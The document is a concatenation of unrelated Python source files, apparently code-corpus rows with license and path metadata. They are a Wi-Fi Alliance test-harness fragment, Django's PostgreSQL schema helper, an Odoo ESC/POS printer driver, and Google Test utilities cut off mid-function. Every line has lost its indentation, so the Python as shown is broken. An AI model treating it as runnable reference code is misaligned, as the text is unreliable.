ss = status.rstrip('\r\n')
logging.debug("%s (%s) <--- %s" % (displayName, toaddr, ss))
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
upload_file_desc.write(stitems[4])
code_no = stitems[3]
upload_file_desc.close()
return
else:
if capi_elem[0] == 'sta_is_connected':
isConnectRetry = 0
while isConnectRetry < 10:
isConnectRetry = isConnectRetry + 1
time.sleep(4)
status = send_capi_command(toaddr, capi_elem)
ss = status.rstrip('\r\n')
logging.info("%s (%-15s) <-- %s" % (displayName, toaddr, ss))
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
retValueTable.setdefault("$IS_CONNECTED", stitems[3])
if "PingInternalChk" in retValueTable:
if retValueTable["PingInternalChk"] == "0":
logging.debug("Skipping IS_CONNECTE check")
return
elif stitems[3] == '1':
return
else:
continue
else:
if stitems[3] == '1':
return
else:
continue
wfa_sys_exit("\n NO ASSOCIATION -- Aborting the test")
else:
status = send_capi_command(toaddr, capi_elem)
ss = status.rstrip('\r\n')
logging.info("%s (%-15s) <-- %s" % (displayName, toaddr, ss))
#Exit in case of ERROR
if re.search('ERROR', ss) or re.search('INVALID', ss) and iDNB == 0 and iINV == 0:
set_test_result("ERROR", "-", "Command returned Error")
wfa_sys_exit(" Command returned Error. Aborting the test")
stitems = ss.split(',')
if stitems[1] == "COMPLETE" and len(stitems) > 3:
if stitems[2] == 'streamID':
if capi_elem[4] == 'send':
streamInfoArray.append(streamInfo("%s;%s" %(stitems[3], toaddr), toaddr, -1, 'send', capi_elem[16], capi_elem[18], runningPhase, RTPCount))
RTPCount = RTPCount+1
else:
streamInfoArray.append(streamInfo("%s;%s" %(stitems[3], toaddr), toaddr, -1, 'receive', -1, -1, runningPhase, -1))
if capi_elem[2] == 'Multicast':
logging.debug("----MULTICAST----")
multicast = 1
if ret_data_idx in retValueTable:
retValueTable[ret_data_idx] = ("%s;%s" %(stitems[3], toaddr))
else:
retValueTable.setdefault(ret_data_idx, "%s;%s" %(stitems[3], toaddr))
elif stitems[2] == 'interfaceType':
retValueTable.setdefault(ret_data_idx, stitems[5])
elif stitems[2].lower() == 'interfaceid':
if ret_data_idx in retValueTable:
retValueTable[ret_data_idx] = stitems[3].split('_')[0]
else:
retValueTable.setdefault(ret_data_idx, stitems[3].split('_')[0])
elif capi_elem[0] == 'traffic_stop_ping':
retValueTable["%s;%s"%(capi_elem[2], toaddr)] = stitems[5]
logging.debug("%s = %s" % (capi_elem[2], retValueTable["%s;%s"%(capi_elem[2], toaddr)]))
if "PingInternalChk" in retValueTable:
if retValueTable["PingInternalChk"] == "0":
logging.debug("Ping Internal Check")
elif stitems[5] == '0':
wfa_sys_exit("\n NO IP Connection -- Aborting the test")
else:
if stitems[5] == '0':
wfa_sys_exit("\n NO IP Connection -- Aborting the test")
if ret_data_def_type[0].lower() == "id":
i = 0
for s in stitems:
if(int(i)%2 == 0) and len(stitems) > i+1:
logging.debug("--------> Adding %s = %s"%(ret_data_def_type[i/2], stitems[i+1]))
stitems[i+1] = stitems[i+1].rstrip(' ')
stitems[i+1] = stitems[i+1].rstrip('\n')
stitems[i+1] = stitems[i+1].rstrip('\r')
if ret_data_def_type[i/2] in retValueTable:
retValueTable[ret_data_def_type[i/2]] = stitems[i+1]
else:
retValueTable.setdefault(ret_data_def_type[i/2], stitems[i+1])
i = int(i) + 1
elif stitems[1] != "COMPLETE" and iINV == 0 and iDNB == 0:
logging.info('Command %s not completed' % capi_run)
if capi_elem[0] == 'sta_associate':
time.sleep(10)
except:
exc_info = sys.exc_info()
logging.error(exc_info[1])
wfa_sys_exit("")
def send_capi_command(toaddr, capi_elem):
"""
Send CAPI commands through socket based on IP address and
port number
Parameters
----------
toaddr : str
IP address and port number
capi_elem : tuple of str
CAPI command followed by parameters with "," as delimiter
Returns
-------
status : str
Contains string specifying command is running, complete
or returning values
Examples
--------
send_capi_command(192.168.0.1:9000, ca_get_version)
send_capi_command(192.168.0.1:9000, sniffer_control_filter_capture,
infile,_521-step1,outfile,521-step1_A,
srcmac,00:11:22:33:44:55,destmac,55:44:33:22:11:00)
"""
global iDNB, iINV
capi_run = ','.join(capi_elem)
capi_cmd = capi_run + ' \r\n'
asock = conntable.get(toaddr)
asock.send(capi_cmd)
displayaddr = toaddr
if toaddr in DisplayNameTable:
displayaddr = DisplayNameTable[toaddr]
logging.info("%s (%-15s) ---> %s" % (displayaddr, toaddr, capi_cmd.rstrip('\r\n')))
status = asock.recv(2048)
logging.debug("%s (%s) <--- %s" % (displayaddr, toaddr, status.rstrip('\r\n')))
# Status,Running
# Quick fix for case where AzWTG sends response RUNNING and COMPLETED in one read
if len(status) > 25:
status = status.split('\n')
status = status[1]
else:
if iDNB == 0:
status = asock.recv(2048)
else:
iDNB = 0
if displayaddr == cSLog.name:
cSLog.log("%s ---> %s" % (displayaddr, capi_cmd.rstrip('\r\n')))
cSLog.log("%s <--- %s\n" % (displayaddr, status.rstrip('\r\n')))
if re.search("FAIL", status) and re.search("SNIFFER", displayaddr) and iINV == 0:
logging.info("%s <--- %s\n" % (displayaddr, status.rstrip('\r\n')))
wfa_sys_exit("Command returned FAIL")
return status
def process_cmdfile(line):
"""
Process the file line by line based on file name and path specified
Parameters
----------
line : str
File name and path
Returns
-------
none
Example
--------
process_cmdfile(C:\\WTS_UCC_Windows\\cmds\\11n\\STA_5.2.1.txt)
"""
i = 0
line = line.rstrip()
filelist = []
filelist = line.split(',')
nfile = len(filelist)
while i < nfile:
logging.debug('Command file ---' + filelist[i])
file = open(filelist[i])
scanner(file, process_cmd)
file.close()
i = i+1
def set_test_result(result, data, rdata):
XLogger.setTestResult(result, data, rdata)
if re.search("PASS", result):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
logging.info("\n TEST RESULT ---> %15s" % result)
elif re.search("FAIL", result):
set_color(FOREGROUND_RED |FOREGROUND_INTENSITY)
logging.info("\n TEST RESULT ---> %15s | %s |" % (result, data))
def process_passFailWMM_1(line):
"""Determines pass or fail for WMM based on results and what is expected"""
global runningPhase
try:
cmd = line.split(',')
P1 = -1
P2 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(runningPhase):
P1 = p.rxBytes
elif p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(runningPhase):
P2 = p.rxBytes
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if (int(P2) <= 0) or (int(P1) <= 0):
actual = -1
else:
actual = (float(P2) / float(P1)) * 100
if actual <= long(cmd[2]):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
result = cmd[3]
else:
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
result = cmd[4]
logging.info("\n ----------------RESULT---------------------------\n")
logging.info("Expected <= %s %s" % (cmd[2], "%"))
logging.info("Actual - %6.6s %s" % (actual, "%"))
logging.info("TEST RESULT ---> %s" % result)
logging.info("\n ------------------------------------------------")
set_color(FOREGROUND_INTENSITY)
set_test_result(result, "%6.6s %s" % (actual, "%"), "<= %s %s" % (cmd[2], "%"))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_passFailWMM(line):
"""Determines pass or fail for WMM based on two phases result and what is expected"""
try:
cmd = line.split(',')
P1 = -1
P2 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == 1:
P1 = p.rxBytes
elif p.streamID == retValueTable[cmd[1]] and int(p.phase) == 2:
P2 = p.rxBytes
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if (int(P2) <= 0) or (int(P1) <= 0):
actual = -1
else:
actual = (float(P2) / float(P1)) * 100
if actual > long(cmd[2]):
set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
result = cmd[3]
else:
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
result = cmd[4]
logging.info("\n ----------------RESULT---------------------------\n")
logging.info("%s Phase 1 = %s Bytes | %s Phase 2 = %s Bytes " %(cmd[5], P1, cmd[5], P2))
logging.info("Expected > %s %s" % (cmd[2], "%"))
logging.info("Actual - %6.6s %s" % (actual, "%"))
logging.info("TEST RESULT ---> %s" % result)
logging.info("\n ------------------------------------------------")
set_color(FOREGROUND_INTENSITY)
set_test_result(result, "%6.6s %s" % (actual, "%"), "> %s %s" % (cmd[2], "%"))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_passFailIBSS(line):
"""Determines pass or fail for IBSS based on results and what is expected"""
try:
cmd = line.split(',')
P1 = -1
logging.debug("Processing PASS/FAIL...")
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]]:
P1 = p.rxBytes
break
logging.info(" Received = %s Bytes Duration = %s Seconds Expected = %s Mbps " % (P1, cmd[2], cmd[1]))
logging.debug(" B = %s B1 = %s" % (((long(P1) / 10000)), ((float(cmd[1]) * 125000))))
if int(P1) <= 0:
actual = -1
else:
actual = ((float(P1) * 8)) / (1000000 * int(cmd[2]))
logging.info("Expected = %s Mbps Received =%s Mbps" % (cmd[1], actual))
if float(actual) >= float(cmd[1]):
result = cmd[3]
else:
result = cmd[4]
set_test_result(result, "-", "-")
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_CheckThroughput(line, Trans):
"""Determines throughput and prints the results and expected to logs"""
try:
cmd = line.split(',')
if cmd[2] in retValueTable:
cmd[2] = retValueTable[cmd[2]]
if cmd[3] in retValueTable:
cmd[3] = retValueTable[cmd[3]]
P1 = -1
logging.debug("Processing Throughput Check...")
if Trans:
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
break
else:
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
break
if int(P1) <= 0:
actual = -1
else:
actual = ((float(P1) * 8))/(1000000 * int(cmd[2]))
condition = ">="
if float(actual) >= float(cmd[3]):
result = cmd[4]
if "fail" in result.lower():
condition = "<="
else:
result = cmd[5]
if "pass" in result.lower():
condition = "<="
logging.debug(" Received = %s Bytes Duration = %s Seconds Expected = %s Mbps " % (P1, cmd[2], cmd[3]))
logging.info("\n Expected %s %s Mbps Actual = %s Mbps" % (condition, cmd[3], actual))
set_test_result(result, "%s Mbps" %(actual), "%s Mbps" %(cmd[3]))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_CheckMCSThroughput(line):
"""Determines MCS throughput and prints the results and expected to logs"""
try:
cmd = line.split(',')
logging.debug("process_CheckMCSThroughput")
logging.debug("-%s-%s-%s-%s-%s" % (cmd[0], cmd[1], cmd[2], cmd[3], cmd[4]))
TX = -1
RX1 = -1
RX2 = -1
logging.debug("Processing Throughput Check...")
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(cmd[0]):
TX = long(p.txBytes)
break
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[2]] and int(p.phase) == int(cmd[0]):
RX1 = long(p.rxBytes)
if p.streamID == retValueTable[cmd[3]] and int(p.phase) == int(cmd[0]):
RX2 = long(p.rxBytes)
logging.debug("-%s-%s-%s-%s" % (TX, RX1, RX2, cmd[4]))
TX = (long(TX)* (float(cmd[4])/100))
actual = -1
if int(TX) <= 0:
actual = -1
else:
if RX1 > TX and RX2 > TX:
actual = 1
if float(actual) > 0:
result = cmd[5]
else:
result = cmd[6]
logging.info("\n MCS Expected %s bytes, actual %s bytes and %s bytes" % (TX, RX1, RX2))
set_test_result(result, "%s Bytes %s Bytes" %(RX1, RX2), "%s Bytes" % (TX))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_CheckDT4(line):
"""Determines amount of DT4 packets and prints the results and expected to logs"""
try:
cmd = line.split(',')
logging.debug("process_Check DT4 Results")
logging.debug("-%s-%s-%s-%s-%s-%s" % (cmd[0], cmd[1], retValueTable[cmd[1]], cmd[2], cmd[3], cmd[4]))
RX = -1
for p in streamSendResultArray:
if p.streamID == retValueTable[cmd[1]] and int(p.phase) == int(cmd[0]):
RX = long(p.rxFrames)
logging.debug("-%s-%s" % (RX, cmd[2]))
actual = -1
if long(RX) > long(cmd[2]):
actual = 1
if float(actual) > 0:
result = cmd[3]
else:
result = cmd[4]
logging.info("\n DT4 Expected > %s packets, actual %s packets" % (cmd[2], RX))
set_test_result(result, "%s Packets" %(RX), "%s Packets" % (cmd[2]))
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def process_ResultCheck(line):
"""Determines pass or fail at the end of the test run"""
try:
cmd = line.split(',')
logging.debug("%s-%s-%s-%s-%s-%s" % (retValueTable[cmd[0]], int(retValueTable["%s" % retValueTable[cmd[0]]]), cmd[0], cmd[1], cmd[2], cmd[3]))
if int(retValueTable["%s" % retValueTable[cmd[0]]]) >= int(cmd[1]):
result = cmd[2]
else:
result = cmd[3]
XLogger.setTestResult(result)
logging.info("\nTEST RESULT ---> %15s" % result)
except:
exc_info = sys.exc_info()
logging.error('Invalid Pass/Fail Formula - %s' % exc_info[1])
def wfa_sys_exit(msg):
"""Exiting because an error has occurred"""
time.sleep(2)
set_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
if re.search("not applicable", msg) or re.search("not supported", msg):
XLogger.setTestResult("TEST N/A")
else:
XLogger.setTestResult("ABORTED123", msg)
XLogger.writeXML()
sys.exit(msg)
def wfa_sys_exit_0():
"""Exiting because a failure has occurred"""
time.sleep(2)
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
logging.disable("ERROR")
XLogger.writeXML()
sys.exit(0)
class XMLLogHandler(logging.FileHandler):
def emit(self, record):
try:
XLogger.log(self.format(record))
self.flush()
except:
self.handleError(record)
XLogger = ""
def init_logging(_filename, level):
global cSLog, XLogger
p = _filename.split('\\')
resultCollectionFile = open("TestResults", "a")
for s in p:
tFileName = s
directory = "./log/%s_%s" %(tFileName.rstrip(".txt"), time.strftime("%b-%d-%Y__%H-%M-%S", time.localtime()))
os.mkdir(directory)
os.system("echo %s > p" % directory)
fname = "%s/log_%s.log" %(directory, tFileName.rstrip(".txt"))
fname_sniffer = "%s/sniffer_log_%s.log" % (directory, tFileName.rstrip(".txt"))
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename=fname,
filemode='w')
cSLog = classifiedLogs("SNIFFER", fname_sniffer, "SNIFFER CHECKS LOG - Testcase: %s \n\n" % tFileName.rstrip(".txt"))
# a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
if level == '2':
console.setLevel(logging.DEBUG)
else:
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
if level != '0':
logging.getLogger('').addHandler(console)
set_color(FOREGROUND_INTENSITY)
# Add XML Log Handler
XLogger = XMLLogger("%s/%s_%s.xml" %
(directory,
tFileName.rstrip(".txt"),
time.strftime("%Y-%m-%dT%H_%M_%SZ",
time.localtime())),
"%s" % (tFileName.rstrip(".txt")))
hXML = XMLLogHandler('t')
XMLformatter = logging.Formatter('%(message)s')
hXML.setFormatter(XMLformatter)
logging.getLogger('').addHandler(hXML)
logging.info("###########################################################\n")
logging.info("UCC Version - %s" % VERSION)
logging.info('Logging started in file - %s' % (fname))
def firstword(line):
global maxThroughput, payloadValue, uccPath
str = line.split('#')
command = str[0].split('!')
if command[0] == 'wfa_control_agent' or command[0] == 'wfa_control_agent_dut':
if retValueTable["$WTS_ControlAgent_Support"] != "0":
process_ipadd(command[1])
retValueTable.setdefault(command[0], "%s:%s" % ((command[1].split(',')[0]).split('=')[1], (command[1].split(',')[1]).split('=')[1]))
elif command[0] == 'wfa_console_ctrl' or command[0] == 'wfa_adept_control_agent' or re.search('control_agent_testbed_sta', command[0]) or re.search('control_agent', command[0]) or re.search('TestbedAPConfigServer', command[0]) or re.search('wfa_sniffer', command[0]) or re.search('ethernet', command[0]):
process_ipadd(command[1])
retValueTable.setdefault(command[0], "%s:%s" % ((command[1].split(',')[0]).split('=')[1], (command[1].split(',')[1]).split('=')[1]))
elif command[0].lower() == 'exit':
wfa_sys_exit("Exiting - %s" % command[1])
elif command[0].lower() == 'info':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
logging.info("\n %7s ~~~~~ %s ~~~~~ \n" %("", command[1]))
elif command[0] == 'wfa_test_commands':
logging.debug('Processing wfa_test_commands')
process_cmdfile("%s%s" % (uccPath, command[1]))
elif command[0] == 'wfa_test_commands_init':
logging.debug('Processing init wfa_test_commands')
logging.debug("UCC Path = %s" % uccPath)
s1 = command[1]
scanner(open(uccPath + s1), firstword)
if "$TestNA" in retValueTable:
logging.error("%s" % retValueTable["%s" % "$TestNA"])
wfa_sys_exit("%s" % retValueTable["%s" % "$TestNA"])
elif command[0] == 'dut_wireless_ip' or command[0] == 'dut_default_gateway' or command[0] == 'wfa_console_tg' or re.search('wireless_ip', command[0]) or re.search('wmmps_console', command[0]) or re.search('tg_wireless', command[0]):
retValueTable.setdefault(command[0], command[1])
elif re.search('define', command[0]):
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
if command[1] in retValueTable:
retValueTable[command[1]] = command[2]
else:
retValueTable.setdefault(command[1], command[2])
elif re.search('DisplayName', command[0]):
if command[1] in retValueTable:
DisplayNameTable.setdefault(retValueTable[command[1]], command[2])
else:
DisplayNameTable.setdefault(command[1], command[2])
elif re.search('throughput', command[0]):
maxThroughput = command[1]
logging.info("Maximum Throughput %s Mbps" % maxThroughput)
retValueTable.setdefault(command[0], command[1])
elif re.search('payload', command[0]):
payloadValue = command[1]
logging.info("Payload = %s Bytes", (command[1]))
retValueTable.setdefault(command[0], command[1])
elif re.search('stream', command[0]):
logging.debug("STREAM = %s, Payload = %s Bytes, Percentage = %s %s of Maximum Throughput" %(command[0], payloadValue, command[1], "%"))
frameRate = int(maxThroughput) * int(command[1])*1250/int(payloadValue)
logging.info("%s %s Frames / second" % (command[0], frameRate))
retValueTable.setdefault(command[0], "%s" % frameRate)
if len(command) == 2:
logging.debug("Command = %s" % (command[1]))
| isc |
vinayan3/clpricehistory | django/db/backends/postgresql/creation.py | 247 | 3753 | from django.db.backends.creation import BaseDatabaseCreation
from django.db.backends.util import truncate_name
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated PostgreSQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
data_types = {
'AutoField': 'serial',
'BooleanField': 'boolean',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'timestamp with time zone',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'inet',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer CHECK ("%(column)s" >= 0)',
'PositiveSmallIntegerField': 'smallint CHECK ("%(column)s" >= 0)',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
}
def sql_table_creation_suffix(self):
assert self.connection.settings_dict['TEST_COLLATION'] is None, "PostgreSQL does not support collation setting at database creation time."
if self.connection.settings_dict['TEST_CHARSET']:
return "WITH ENCODING '%s'" % self.connection.settings_dict['TEST_CHARSET']
return ''
def sql_indexes_for_field(self, model, f, style):
if f.db_index and not f.unique:
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
tablespace = f.db_tablespace or model._meta.db_tablespace
if tablespace:
sql = self.connection.ops.tablespace_sql(tablespace)
if sql:
tablespace_sql = ' ' + sql
else:
tablespace_sql = ''
else:
tablespace_sql = ''
def get_index_sql(index_name, opclass=''):
return (style.SQL_KEYWORD('CREATE INDEX') + ' ' +
style.SQL_TABLE(qn(truncate_name(index_name,self.connection.ops.max_name_length()))) + ' ' +
style.SQL_KEYWORD('ON') + ' ' +
style.SQL_TABLE(qn(db_table)) + ' ' +
"(%s%s)" % (style.SQL_FIELD(qn(f.column)), opclass) +
"%s;" % tablespace_sql)
output = [get_index_sql('%s_%s' % (db_table, f.column))]
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
db_type = f.db_type(connection=self.connection)
if db_type.startswith('varchar'):
output.append(get_index_sql('%s_%s_like' % (db_table, f.column),
' varchar_pattern_ops'))
elif db_type.startswith('text'):
output.append(get_index_sql('%s_%s_like' % (db_table, f.column),
' text_pattern_ops'))
else:
output = []
return output
| bsd-3-clause |
Fl0rianFischer/sme_odoo | addons/hw_escpos/escpos/printer.py | 101 | 6802 | #!/usr/bin/python
import usb.core
import usb.util
import serial
import socket
from escpos import *
from constants import *
from exceptions import *
from time import sleep
class Usb(Escpos):
""" Define USB printer """
def __init__(self, idVendor, idProduct, interface=0, in_ep=0x82, out_ep=0x01):
"""
@param idVendor : Vendor ID
@param idProduct : Product ID
@param interface : USB device interface
@param in_ep : Input end point
@param out_ep : Output end point
"""
self.errorText = "ERROR PRINTER\n\n\n\n\n\n"+PAPER_FULL_CUT
self.idVendor = idVendor
self.idProduct = idProduct
self.interface = interface
self.in_ep = in_ep
self.out_ep = out_ep
self.open()
def open(self):
""" Search device on USB tree and set is as escpos device """
self.device = usb.core.find(idVendor=self.idVendor, idProduct=self.idProduct)
if self.device is None:
raise NoDeviceError()
try:
if self.device.is_kernel_driver_active(self.interface):
self.device.detach_kernel_driver(self.interface)
self.device.set_configuration()
usb.util.claim_interface(self.device, self.interface)
except usb.core.USBError as e:
raise HandleDeviceError(e)
def close(self):
i = 0
while True:
try:
if not self.device.is_kernel_driver_active(self.interface):
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(self.interface)
usb.util.dispose_resources(self.device)
else:
self.device = None
return True
except usb.core.USBError as e:
i += 1
if i > 10:
return False
sleep(0.1)
def _raw(self, msg):
""" Print any command sent in raw format """
if len(msg) != self.device.write(self.out_ep, msg, self.interface):
self.device.write(self.out_ep, self.errorText, self.interface)
raise TicketNotPrinted()
def __extract_status(self):
maxiterate = 0
rep = None
while rep == None:
maxiterate += 1
if maxiterate > 10000:
raise NoStatusError()
r = self.device.read(self.in_ep, 20, self.interface).tolist()
while len(r):
rep = r.pop()
return rep
def get_printer_status(self):
status = {
'printer': {},
'offline': {},
'error' : {},
'paper' : {},
}
self.device.write(self.out_ep, DLE_EOT_PRINTER, self.interface)
printer = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_OFFLINE, self.interface)
offline = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_ERROR, self.interface)
error = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_PAPER, self.interface)
paper = self.__extract_status()
status['printer']['status_code'] = printer
status['printer']['status_error'] = not ((printer & 147) == 18)
status['printer']['online'] = not bool(printer & 8)
status['printer']['recovery'] = bool(printer & 32)
status['printer']['paper_feed_on'] = bool(printer & 64)
status['printer']['drawer_pin_high'] = bool(printer & 4)
status['offline']['status_code'] = offline
status['offline']['status_error'] = not ((offline & 147) == 18)
status['offline']['cover_open'] = bool(offline & 4)
status['offline']['paper_feed_on'] = bool(offline & 8)
status['offline']['paper'] = not bool(offline & 32)
status['offline']['error'] = bool(offline & 64)
status['error']['status_code'] = error
status['error']['status_error'] = not ((error & 147) == 18)
status['error']['recoverable'] = bool(error & 4)
status['error']['autocutter'] = bool(error & 8)
status['error']['unrecoverable'] = bool(error & 32)
status['error']['auto_recoverable'] = not bool(error & 64)
status['paper']['status_code'] = paper
status['paper']['status_error'] = not ((paper & 147) == 18)
status['paper']['near_end'] = bool(paper & 12)
status['paper']['present'] = not bool(paper & 96)
return status
def __del__(self):
""" Release USB interface """
if self.device:
self.close()
self.device = None
class Serial(Escpos):
""" Define Serial printer """
def __init__(self, devfile="/dev/ttyS0", baudrate=9600, bytesize=8, timeout=1):
"""
@param devfile : Device file under dev filesystem
@param baudrate : Baud rate for serial transmission
@param bytesize : Serial buffer size
@param timeout : Read/Write timeout
"""
self.devfile = devfile
self.baudrate = baudrate
self.bytesize = bytesize
self.timeout = timeout
self.open()
def open(self):
""" Setup serial port and set is as escpos device """
self.device = serial.Serial(port=self.devfile, baudrate=self.baudrate, bytesize=self.bytesize, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=self.timeout, dsrdtr=True)
if self.device is not None:
print "Serial printer enabled"
else:
print "Unable to open serial printer on: %s" % self.devfile
def _raw(self, msg):
""" Print any command sent in raw format """
self.device.write(msg)
def __del__(self):
""" Close Serial interface """
if self.device is not None:
self.device.close()
class Network(Escpos):
""" Define Network printer """
def __init__(self,host,port=9100):
"""
@param host : Printer's hostname or IP address
@param port : Port to write to
"""
self.host = host
self.port = port
self.open()
def open(self):
""" Open TCP socket and set it as escpos device """
self.device = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.device.connect((self.host, self.port))
if self.device is None:
print "Could not open socket for %s" % self.host
def _raw(self, msg):
self.device.send(msg)
def __del__(self):
""" Close TCP connection """
self.device.close()
| gpl-3.0 |
windyuuy/opera | chromium/src/testing/gtest/test/gtest_test_utils.py | 408 | 10444 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
import subprocess
_SUBPROCESS_MODULE_AVAILABLE = True
except:
import popen2
_SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
'build_dir': os.path.dirname(sys.argv[0])}
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
"""Parses and strips Google Test flags from argv. This is idempotent."""
# Suppresses the lint complaint about a global variable since we need it
# here to maintain module-wide state.
global _gtest_flags_are_parsed # pylint: disable-msg=W0603
if _gtest_flags_are_parsed:
return
_gtest_flags_are_parsed = True
for flag in _flag_map:
# The environment variable overrides the default value.
if flag.upper() in os.environ:
_flag_map[flag] = os.environ[flag.upper()]
# The command line flag overrides the environment variable.
i = 1 # Skips the program name.
while i < len(argv):
prefix = '--' + flag + '='
if argv[i].startswith(prefix):
_flag_map[flag] = argv[i][len(prefix):]
del argv[i]
break
else:
# We don't increment i in case we just found a --gtest_* flag
# and removed it from argv.
i += 1
def GetFlag(flag):
"""Returns the value of the given flag."""
# In case GetFlag() is called before Main(), we always call
# _ParseAndStripGTestFlags() here to make sure the --gtest_* flags
# are parsed.
_ParseAndStripGTestFlags(sys.argv)
return _flag_map[flag]
def GetSourceDir():
"""Returns the absolute path of the directory where the .py files are."""
return os.path.abspath(GetFlag('source_dir'))
def GetBuildDir():
"""Returns the absolute path of the directory where the test binaries are."""
return os.path.abspath(GetFlag('build_dir'))
_temp_dir = None
def _RemoveTempDir():
if _temp_dir:
shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
"""Returns a directory for temporary files."""
global _temp_dir
if not _temp_dir:
_temp_dir = tempfile.mkdtemp()
return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
